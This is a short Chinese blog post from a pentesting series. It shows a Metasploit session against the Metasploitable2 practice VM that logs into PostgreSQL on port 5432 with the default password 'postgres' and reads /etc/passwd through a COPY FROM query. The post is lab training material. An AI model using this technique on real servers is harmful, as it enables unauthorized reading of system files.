Metasploitable2 - tcp port 5432 - postgres

最新推荐文章于 2023-01-16 21:20:42 发布
最新推荐文章于 2023-01-16 21:20:42 发布
阅读量1.1k 收藏
点赞数
分类专栏: Pentesting Metasploitable2 Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/38326823
版权

PostgreSQL是以加州大学伯克利分校计算机系开发的 POSTGRES,现在已经更名为PostgreSQL. Metasploit 默认后端使用的就是该数据库.


msf auxiliary(postgres_readfile) > show options

Module options (auxiliary/admin/postgres/postgres_readfile):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD                   no        The password for the specified username. Leave blank for a random password.
   RFILE     /etc/passwd      yes       The remote file
   RHOST                      yes       The target address
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

msf auxiliary(postgres_readfile) > set RHOST 192.168.1.111
RHOST => 192.168.1.111
msf auxiliary(postgres_readfile) > set PASSWORD postgres
PASSWORD => postgres
msf auxiliary(postgres_readfile) > run

Query Text: 'CREATE TEMP TABLE EAQkNVJNpCMqfQa (INPUT TEXT);
      COPY EAQkNVJNpCMqfQa FROM '/etc/passwd';
      SELECT * FROM EAQkNVJNpCMqfQa'

上面通过弱口令,可以登陆数据库.
Nixawk
关注
专栏目录
kali linux对Metasploitable2漏洞利用,postgresql爆力破解 笔记
边城浪子的博客
09-19 631
PostgreSQL是以加州大学伯克利分校计算机系开发的 POSTGRES,现在已经更名为PostgreSQL,版本 4.2为基础的对象关系型数据库管理系统(ORDBMS)。PostgreSQL支持大部分 SQL标准并且提供了许多其他现代特性:复杂查询、外键、触发器、视图、事务完整性、MVCC。同样,PostgreSQL 可以用许多方法扩展,比如, 通过增加新的数据类型、函数、操作符、聚集函数、索...
PostgreSQL Unable to connect to server: XXX port 5432 failed: Connection refused
ideal-lingyun
03-17 4317
PostgreSQL Unable to connect to server: XXX port 5432 failed: Connection refused
PgSQL无法连接的问题
weixin_42537209的博客
01-16 5959
PgSQL输入密码后提示 postgres connection to server at “localhost“ (::1), port 5432 failed: Connection refused. 的解决办法
metasploitable2靶机
雨泽网络工作室
08-16 4910
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
postgres connection to server at “localhost“ (::1), port 5432 failed: Connection refused
Daily_365的博客
08-04 1万+
今天打开pgAdmin4的时候发现总是报错,即便输入密码,还是不停弹出输入密码的界面
flink-sql-connector-postgres-cdc-1.2.0.jar
03-05
flink cdc postgres 数据同步 jar包,2021年最新版
flink-connector-postgres-cdc-1.4.0.jar
04-21
flink-connector-postgres-cdc-1.4.0.jar
docker-postgres-backup-local:通过定期备份将PostgresSQL备份到本地文件系统并轮换备份
04-29
postgres-backup-local 基于 ,通过定期的循环备份将PostgresSQL备份到本地文件系统。 通过在POSTGRES_DB设置数据库名称(用逗号或空格分隔),从同一主机备份多个数据库。 支持以下Docker架构: linux/amd64 , ...
Rust-Postgres-本地PostgreSQL客户端-Rust开发
05-27
Rust-Postgres PostgreSQL对Rust的支持。...postgres-native-tls文档TLS支持通过native-tls对postgres和tokio-postgres进行支持。 postgres-openssl文档支持通过openssl对postgres和tokio-postgres的TLS支持。
purescript-node-postgres:node-postgres的PureScript绑定
03-03
Node-postgres的PureScript绑定 用于PureScript绑定(在GitHub上为 )。 安装 克隆项目并安装其依赖项: git clone https://github.com/epost/purescript-node-postgres cd purescript-node-postgres npm install ...
PostgreSQL渗透测试总结
爱上卿的博客
01-24 2386
一、前言 PostgreSQL是一个开源数据库,主要部署于Linux操作系统中。然而,PostgreSQL的兼容性非常好,可以兼容多个操作系统,也能在Windows及MacOS操作系统上运行。如果PostgreSQL数据库没有被正确配置,并且攻击者已经事先获取了凭证信息,那么他们就可以实施各类攻击行为,比如读写系统文件以及执行任意代码等。 来演示的目标系统是Metasploitable 2,因...
Metasploitable2使用指南
张同光 (Tongguang Zhang):Hello everyone !
04-22 1万+
http://www.freebuf.com/articles/system/34571.html Metasploitable 2 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,
Metasploit连接数据库失败
独行者103的专栏
04-09 3593
Failed to connect to the database: could not connect to server: Connection refused Is the server running on host "localhost" (::1) and accepting TCP/IP connections on port 5432?
metasploit 连接postgresql可能遇见的问题
xysoul的专栏
09-01 2306
前言 由于kali linux的版本不同,默认情况下对metasploitpostgresql的配置也不相同,导致我们启动metasploit后连接postgresql数据库会遇到无法连接的情况。下面就三种情况,简单的给大家描述一下,以及遇到问题的解决方案。 理想状态 理想情况下,只需要两步即可。 1.      启动postgresql service postgre
could not connect to server: Connection refused(0x0000274D/10061) .......TCP/IP connections on 5432?
热门推荐
11-01 2万+
服务器是否在主机“192.168.113.154”上运行并且在5432上接受TCP / IP连接?无法连接到服务器:连接被拒绝(0x0000274D / 10061)
kali-渗透攻击tomcat服务
齐泽文的Blog
04-16 6638
本文实验攻击目标为Metasploitable2-Linux1、打开msfconsole控制台root@qzwhost:~# msfconsole [-] Failed to connect to the database: could not connect to server: Connection refused Is the server running on host "localho...
【SQL注入技巧拓展】————11、PostgreSQL渗透测试指南
Fly_鹏程万里
12-24 583
我之所以写这篇文章,目的在于为渗透测试人员提供测试PostgreSQL数据库的具体方法。文章中用来演示的目标系统是Metasploitable 2,因为该系统包含许多漏洞,也存在配置不当问题。 一、前言 PostgreSQL是一个开源数据库,主要部署于Linux操作系统中。然而,PostgreSQL的兼容性非常好,可以兼容多个操作系统,也能在Windows及MacOS操作系统上运行。如果P...
postgresql备份还原
kittycsv的专栏
05-26 568
nohup pg_restore --host "127.0.0.1" --port "5432" --username "postgres" --no-password --dbname "{dbname}" --verbose --clean "$backuppath/{dbname}$cur_date.bak"
C:\Program Files\PostgreSQL\15\bin\pg_restore.exe --host "localhost" --port "5432" --username "postgres" --no-password --dbname "thepartydb" --verbose "C:\\Users\\dell\\Desktop\\DJLZ20~1.SQL"
最新发布
07-12
C:\Program Files\PostgreSQL\15\bin\pg_restore.exe --host "localhost" --port "5432" --username "postgres" --no-password --dbname "thepartydb" --verbose "C:\\Users\\dell\\Desktop\\DJLZ20~1.SQL" ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值